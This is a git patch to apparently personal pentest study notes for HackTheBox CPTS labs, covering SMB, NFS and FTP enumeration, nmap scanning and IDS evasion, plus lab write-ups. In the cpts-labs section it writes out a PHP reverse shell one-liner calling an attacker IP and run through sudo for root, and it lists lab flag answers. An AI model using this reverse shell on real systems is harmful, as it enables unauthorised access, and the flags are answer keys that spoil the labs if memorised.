From 3a9ac4089631fee79a6e169c4b0ed15d650a290a Mon Sep 17 00:00:00 2001 From: amandaguglieri Date: Tue, 11 Jun 2024 16:27:57 -0400 Subject: [PATCH] feat: notes on CPTS --- docs/137-138-139-445-smb.md | 9 + docs/2049-nfs-network-file-system.md | 4 +- docs/21-ftp.md | 69 ++++-- docs/cpts-labs.md | 300 +++++++++++++++++++++++++++ docs/gobuster.md | 9 +- docs/htb-bank.md | 2 +- docs/information-gathering.md | 18 +- docs/nmap.md | 37 ++-- docs/samba-suite.md | 2 + 9 files changed, 413 insertions(+), 37 deletions(-) diff --git a/docs/137-138-139-445-smb.md b/docs/137-138-139-445-smb.md index acc13fd8ad..d3679b0f73 100644 --- a/docs/137-138-139-445-smb.md +++ b/docs/137-138-139-445-smb.md @@ -95,6 +95,15 @@ We will try to connect to each of the shares except for the IPC$ one, which is n ```bash # the use of / and \ might be different if you need to escape some characters smbclient \\\\$ip\\ADMIN$ + +# download file.txt +get file.txt + +# List files +!ls + +# Cat a file.txt +!cat file.txt ``` ### 2. smb2 security levels diff --git a/docs/2049-nfs-network-file-system.md b/docs/2049-nfs-network-file-system.md index 7bfaf6d263..24138d4209 100644 --- a/docs/2049-nfs-network-file-system.md +++ b/docs/2049-nfs-network-file-system.md @@ -13,7 +13,7 @@ tags: # Port 2049 - NFS Network File System -Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems +over a network as if they were local. However, it uses an entirely different protocol. [NFS](https://en.wikipedia.org/wiki/Network_File_System) is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers. +Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems over a network as if they were local. However, it uses an entirely different protocol. [NFS](https://en.wikipedia.org/wiki/Network_File_System) is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers. NFS is an Internet standard that governs the procedures in a distributed file system. While NFS protocol version 3.0 (`NFSv3`), which has been in use for many years, authenticates the client computer, this changes with `NFSv4`. Here, as with the Windows SMB protocol, the user must authenticate. @@ -92,7 +92,7 @@ ls -n mnt/nfs/ sudo umount ./target-NFS ``` -By default nfs server has root_squash on which makes client access nobody:nogroup. To bypass it, sudo su your user to be root. +By default nfs server has root_squash option on, which makes client access nobody:nogroup. To bypass it, sudo su your user to be root. ## Attacking wrong configured NFS diff --git a/docs/21-ftp.md b/docs/21-ftp.md index 32d8df2482..1a81e0b96b 100644 --- a/docs/21-ftp.md +++ b/docs/21-ftp.md @@ -48,6 +48,7 @@ ftp $ip The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account. + ## Basic usage ``` @@ -98,14 +99,33 @@ wget -m --no-passive ftp://anonymous:anonymous@$ip find / -type f -name ftp* 2>/dev/null | grep scripts # Run a general scanner for version, mode aggresive and perform default scripts -sudo nmap -sV -p21 -sC -A $ip +sudo nmap -sV -p21 -sC -A $ip --script-trace +# --script-trace > trace the progress of NSE scripts at the network level +# -sV > version scan +# -A > aggressive scan +# -sC > the default script scan +``` + +Some nmap scripts related to ftp: + +``` # ftp-anon NSE script checks whether the FTP server allows anonymous access. # ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status. + + ``` [See more about nmap for scanning, running scripts and footprinting](nmap.md) +## Interact with the service + +``` +nc -nv $ip 21 +telnet $ip 21 +openssl s_client -connect $ip:21 -starttls ftp +``` + ## Attacking FTP ### Brute forcing with Medusa @@ -206,22 +226,39 @@ sudo apt install vsftpd The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. +``` +cat /etc/vsftpd.conf | grep -v "#" +``` -|**Setting**|**Description**| -|---|---| -|`listen=NO`|Run from inetd or as a standalone daemon?| -|`listen_ipv6=YES`|Listen on IPv6 ?| -|`anonymous_enable=NO`|Enable Anonymous access?| -|`local_enable=YES`|Allow local users to login?| -|`dirmessage_enable=YES`|Display active directory messages when users go into certain directories?| -|`use_localtime=YES`|Use local time?| -|`xferlog_enable=YES`|Activate logging of uploads/downloads?| -|`connect_from_port_20=YES`|Connect from port 20?| -|`secure_chroot_dir=/var/run/vsftpd/empty`|Name of an empty directory| -|`pam_service_name=vsftpd`|This string is the name of the PAM service vsftpd will use.| -|`rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem`|The last three options specify the location of the RSA certificate to use for SSL encrypted connections.| -|`rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key`|| -|`ssl_enable=NO`|| +| **Setting** | **Description** | +| ------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------- | +| `listen=NO` | Run from inetd or as a standalone daemon? | +| `listen_ipv6=YES` | Listen on IPv6 ? | +| `anonymous_enable=NO` | Enable Anonymous access? | +| `local_enable=YES` | Allow local users to login? | +| `dirmessage_enable=YES` | Display active directory messages when users go into certain directories? | +| `use_localtime=YES` | Use local time? | +| `xferlog_enable=YES` | Activate logging of uploads/downloads? | +| `connect_from_port_20=YES` | Connect from port 20? | +| `secure_chroot_dir=/var/run/vsftpd/empty` | Name of an empty directory | +| `pam_service_name=vsftpd` | This string is the name of the PAM service vsftpd will use. | +| `rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem` | The last three options specify the location of the RSA certificate to use for SSL encrypted connections. | +| `rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key` | | +| `ssl_enable=NO` | | In addition, there is a file called `/etc/ftpusers` that we also need to pay attention to, as this file is used to deny certain users access to the FTP service. +``` +cat /etc/ftpusers +``` + +Dangerous settings: + +| **Setting** | **Description** | +| ------------------------------ | ---------------------------------------------------------------------------------- | +| `anonymous_enable=YES` | Allowing anonymous login? | +| `anon_upload_enable=YES` | Allowing anonymous to upload files? | +| `anon_mkdir_write_enable=YES` | Allowing anonymous to create new directories? | +| `no_anon_password=YES` | Do not ask anonymous for password? | +| `anon_root=/home/username/ftp` | Directory for anonymous. | +| `write_enable=YES` | Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? | \ No newline at end of file diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md index 2b8b1f2c59..23c65e8ed9 100644 --- a/docs/cpts-labs.md +++ b/docs/cpts-labs.md @@ -340,4 +340,304 @@ cat /home/mrb3n/user.txt **After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.** +Check out our permissions +``` +sudo -l +``` + +Results: + +``` +Matching Defaults entries for www-data on gettingstarted: + env_reset, mail_badpass, + secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin + +User www-data may run the following commands on gettingstarted: + (ALL : ALL) NOPASSWD: /usr/bin/php + +``` + +Grab a simple php reverse shell such as: + +``` +php -r '$sock=fsockopen("$AttackerIP",4444);exec("/bin/sh <&3 >&3 2>&3");' +``` + +Set up a netcat listener on port 4444: + +``` +nc -lnvp +``` + + +Run as sudo: + +``` +sudo /usr/bin/php -r '$sock=fsockopen("$AttackerIP",4444);exec("/bin/sh <&3 >&3 2>&3"); +``` + +You are root in the listener. Now + +``` +cat /root/root.txt +``` + +**Results**: f1fba6e9f71efb2630e6e34da6387842 + + + +## NETWORK ENUMERATION WITH NMAP + +### Host Enumeration + +#### [Host Discovery](https://academy.hackthebox.com/module/19/section/101) + +**Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result.** + + +``` +sudo nmap $ip -sn -oA host -PE --packet-trace --disable-arp-ping +``` + +**Result**: Windows + +#### [Host and Port Scanning](https://academy.hackthebox.com/module/19/section/102) + + +**Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.** + +``` +nmap $ip +``` + +**Results**: 7 + + +**Enumerate the hostname of your target and submit it as the answer. (case-sensitive):** + +``` +sudo nmap $ip -Pn -sC -sV -p22,80,110,139,143,445,31337 +``` + +**Results**: nix-nmap-default + + +#### [Saving the Results](https://academy.hackthebox.com/module/19/section/104) + + Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer. + +``` +nmap $ip +``` + +Results: 31337 + + +#### [Service Enumeration](https://academy.hackthebox.com/module/19/section/103) + +Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. + +``` +sudo nmap $ip -Pn -sC -sV -p22,80,110,139,143,445,31337 +``` + +Results: HTB{pr0F7pDv3r510nb4nn3r} + + +#### [Nmap Scripting Engine](https://academy.hackthebox.com/module/19/section/108) + +**Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.** + +``` +sudo nmap $ip -p80 --script vuln +``` + +Result: + +``` +Pre-scan script results: +| broadcast-avahi-dos: +| Discovered hosts: +| 224.0.0.251 +| After NULL UDP avahi packet DoS (CVE-2011-1002). +|_ Hosts are all up (not vulnerable). +Nmap scan report for 10.129.68.164 +Host is up (0.047s latency). + +PORT STATE SERVICE +80/tcp open http +|_http-csrf: Couldn't find any CSRF vulnerabilities. +|_http-dombased-xss: Couldn't find any DOM based XSS. +|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. +| http-enum: +|_ /robots.txt: Robots file +``` + +Go to robots.txt and get the flag. + +Results: HTB{873nniuc71bu6usbs1i96as6dsv26} + + +### Bypass Security Measures + + +#### [Firewall and IDS/IPS Evasion - Easy Lab](https://academy.hackthebox.com/module/19/section/117) + +Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer. + +``` +sudo nmap -sC -sV $ip -p80 -Pn --max-retries 3 --initial-rtt-timeout 50ms --max-rtt-timeout 100ms +``` + +Results: Ubuntu + + + +#### [Firewall and IDS/IPS Evasion - Medium Lab](https://academy.hackthebox.com/module/19/section/118) + +After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. + +``` +sudo nmap -sU -p53 --script dns-nsid $ip +``` + +Results: HTB{GoTtgUnyze9Psw4vGjcuMpHRp} + + +#### [Firewall and IDS/IPS Evasion - Hard Lab](https://academy.hackthebox.com/module/19/section/119) + + Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. + +``` +sudo nc -nv -p 53 $ip 50000 +``` + + +Results: HTB{kjnsdf2n982n1827eh76238s98di1w6} + + + +## NETWORK ENUMERATION WITH NMAP + +### FTP + +Which version of the FTP server is running on the target system? Submit the entire banner as the answer. + +``` +nc -nv $ip 21 +``` + +Results: InFreight FTP v1.1 + + +Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer. + +``` +ftp $ip +``` + +Enter user anonymous. + +Enter password anonymous. + +``` +ftp> dir +ftp> get flag.txt +ftp> quit + +cat flag. +``` + +Results: HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre} + + +### SMB + +What version of the SMB server is running on the target system? Submit the entire banner as the answer. + +``` +sudo nmap $ip -p445 -sV -A -sC +``` + +Results: Samba smbd 4.6.2 + + + What is the name of the accessible share on the target? + +``` + smbclient -L //$ip +``` + +Results: sambashare + + +Connect to the discovered share and find the flag.txt file. Submit the contents as the answer. + +``` +smbclient //$ip/sambashare -U "" +dir +cd contents +ls +get flag.txt +quit +cat flag.txt +``` + +Results: HTB{o873nz4xdo873n4zo873zn4fksuhldsf} + + +Find out which domain the server belongs to. + +``` +rpcclient -U "" $ip +rpcclient $> querydominfo +``` + +Results: DEVOPS + +Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. + +``` +rpcclient $> netsharegetinfo sambashare +``` + +Results: InFreight SMB v3.1 + + + +What is the full system path of that specific share? (format: "/directory/names") + +``` +rpcclient $> netsharegetinfo sambashare +``` + +Results: /home/sambauser + + +### NFS + + +Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer. + +``` +sudo nmap $ip -p111,2049 -sV -sC +showmount -e $ip +mkdir target +sudo mount -t nfs $ip:/ ./target -o nolock +cd target +tree . +cat var/nfs/flag.txt +``` + +Results: HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze} + + + +Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer. + +``` +cat mnt/nfsshare/flag.txt +``` + +Results: HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34} diff --git a/docs/gobuster.md b/docs/gobuster.md index 464f702c7c..c86f959bcf 100644 --- a/docs/gobuster.md +++ b/docs/gobuster.md @@ -7,7 +7,14 @@ TableOfContents: true # gobuster -Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). Also, dictionaries are not API-specific. But here are some commands for Gobuster: +Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). + +## Installation + +Repository: [https://github.com/OJ/gobuster](https://github.com/OJ/gobuster) + +Also, dictionaries are not API-specific. But here are some commands for Gobuster: + ```bash gobuster dir -u -w -b 403,4.4 -x .php,.txt -r diff --git a/docs/htb-bank.md b/docs/htb-bank.md index 48b0c9fec6..a3b3511bd2 100644 --- a/docs/htb-bank.md +++ b/docs/htb-bank.md @@ -185,7 +185,7 @@ And results: `/var/htb/bin/emergency` catches our attention inmediately. Doing a strings on it we can see that it contains a "/bin/bash" command. After resolving this machine, I read [this writeup](https://0xdf.gitlab.io/2020/07/07/htb-bank.html#emergency) and got some insights about how to investigate an elf file beyond doing some strings. In this writeup, a md5sum is done and googling the hash returned that this elf file is in reality a dash shell. -Nice. Run the binary and you are root. +Nice. Run the binary and you are root. If you have spawned the shell you may run into problems. Better do it without spawning it. ```bash ./var/htb/bin/emergency diff --git a/docs/information-gathering.md b/docs/information-gathering.md index a11b2c9a48..b22e1056c2 100644 --- a/docs/information-gathering.md +++ b/docs/information-gathering.md @@ -119,7 +119,7 @@ A valuable resource for this information is the Domain Name System (DNS). We can > Some if these tools can also be used in Active DNS enumerations. -Worth trying: [DNSRecon](dnsrecon.md). +Worth trying: [DNSRecon](dnsrecon.md) and https://domain.glass/ | Tool + Cheat sheet | What it does | | ------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | @@ -128,6 +128,7 @@ Worth trying: [DNSRecon](dnsrecon.md). | [dnscan](dnscan.md) | Python wordlist-based DNS subdomain scanner. | | [DNSRecon](dnsrecon.md) | Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. | | [dnsdumpster.com](https://dnsdumpster.com/) | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process. | +| https://domain.glass/ | | ### 1.3. Reviewing server metafiles @@ -160,8 +161,15 @@ Some of these files: |:---|:---|:---|:---| |1.1|[WSTG-INFO-01](OWASP/WSTG-INFO-01.md) |[Conduct Search Engine Discovery Reconnaissance for Information Leakage](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage)|- Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).| +### 1.5. Cloud resources -### 1.5. Fingerprint web application technology and frameworks +Buckets, blob, ...: https://buckets.grayhatwarfare.com/ + +https://domain.glass/ + + + +### 1.6. Fingerprint web application technology and frameworks !!! quote "" [OWASP Web Security Testing Guide 4.2](OWASP/index.md) > 1. Information Gathering > 1.8. Fingerprint Web Application Framework @@ -255,7 +263,7 @@ sudo nmap -v $ip --script banner.nse -### 1.6. WAF detection +### 1.7. WAF detection #### wafw00f @@ -277,7 +285,7 @@ wafw00f -v https://www.example.com nmap -p443 --script http-waf-detect ``` -### 1.7. Code analysis: HTTRack and EyeWitness +### 1.8. Code analysis: HTTRack and EyeWitness !!! quote "" [OWASP Web Security Testing Guide 4.2](OWASP/index.md) > 1. Information Gathering > 1.7. Map Execution Paths through applications @@ -324,7 +332,7 @@ After that you will get a report.html file with the request and a screenshot of eyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080 ``` -### 1.8. Passive crawling with Burp Suite +### 1.9. Passive crawling with Burp Suite **Crawling** is the process of navigating around the web application, following links, submitting forms and logging in (where possible) with the objective of mapping out and cataloging the web application and the navigational paths within it. diff --git a/docs/nmap.md b/docs/nmap.md index 37a44af2d0..e037c4d6e2 100644 --- a/docs/nmap.md +++ b/docs/nmap.md @@ -9,9 +9,15 @@ tags: - active recon - passiverecon --- - # nmap - A network exploration and security auditing tool + +??? abstract "Sources of this notes" + - [HackTheBox Academy: Network enumeration with nmap](https://academy.hackthebox.com/module/details/19) + - nmap documentation. + + + ## Description Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. Another discovery feature is that of operating system detection. These features are extensible by scripts that provide more advanced service detection. @@ -174,8 +180,11 @@ nmap $ip -sC # Run scripts from a category. See categories below nmap $ip --script -# Run specific scripts +# Run defined scripts nmap --script ,, -p $ip + +# Run custom scripts: +# Save them in /usr/share/nmaps/script ``` @@ -299,14 +308,14 @@ sudo nmap $ip/24 -F --min-rate 300 Nmap offers six different timing templates (`-T <0-5>`), being defaul one, -T 3. -| Flag | Mode| -| ---- | ------ | -| -T 0 | Paranoid | -| -T 1 | Sneaky | -| -T 2 | Polite | -| -T 3 | Normal | +| Flag | Mode | +| ---- | ---------- | +| -T 0 | Paranoid | +| -T 1 | Sneaky | +| -T 2 | Polite | +| -T 3 | Normal | | -T 4 | Aggressive | -| -T 5 | Insane | +| -T 5 | Insane | More on [nmap documentation](https://nmap.org/book/performance-timing-templates.html). @@ -372,7 +381,7 @@ sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace # SYN-Scan From DNS Port -sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 + # PORT STATE SERVICE # 50000/tcp open ibm-db2 ``` @@ -380,7 +389,7 @@ sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port Following the example, a possible exploitation for this weak configuration would be: ```shell-session -nc -nv -p 53 $ip 50000 + ``` @@ -450,6 +459,10 @@ List of the most filtered ports: 80, 25, 22, 443, 21, 113, 23, 53, 554, 3389, 1 By default, `Nmap` scans the top 1000 TCP ports with the SYN scan (`-sS`). This SYN scan is set only to default when we run it as root because of the socket permissions required to create raw TCP packets. Therefore, by default, Nmap performs a SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). Unprivileged users can only execute connect and FTP bounce scans. +- If our target sends an `SYN-ACK` flagged packet back to the scanned port, Nmap detects that the port is `open`. +- If the packet receives an `RST` flag, it is an indicator that the port is `closed`. +- If Nmap does not receive a packet back, it will display it as `filtered`. Depending on the firewall configuration, certain packets may be dropped or ignored by the firewall. + ![TCP SYN scan](img/nmap_ss.jpeg) - No connection established, but we got our response. @@ -542,7 +555,7 @@ xsltproc target.xml -o target.html It can be done with `-packet-trace` or with `--reason`. ```shell-session -sudo nmap -sn -oA host -PE --packet-trace +sudo nmap -sn -oA host o # -sn Disables port scanning. # -oA host Stores the results in all formats starting with the name 'host'. # -PE Performs the ping scan by using 'ICMP Echo requests' against the target. diff --git a/docs/samba-suite.md b/docs/samba-suite.md index 28ea9bd5c2..78881610d4 100644 --- a/docs/samba-suite.md +++ b/docs/samba-suite.md @@ -51,4 +51,6 @@ Be careful, sometimes the shell removes the slashes and you need to escape them. - from smb command line: ```smb get flag_1.txt + !ls + !cat flag.txt ```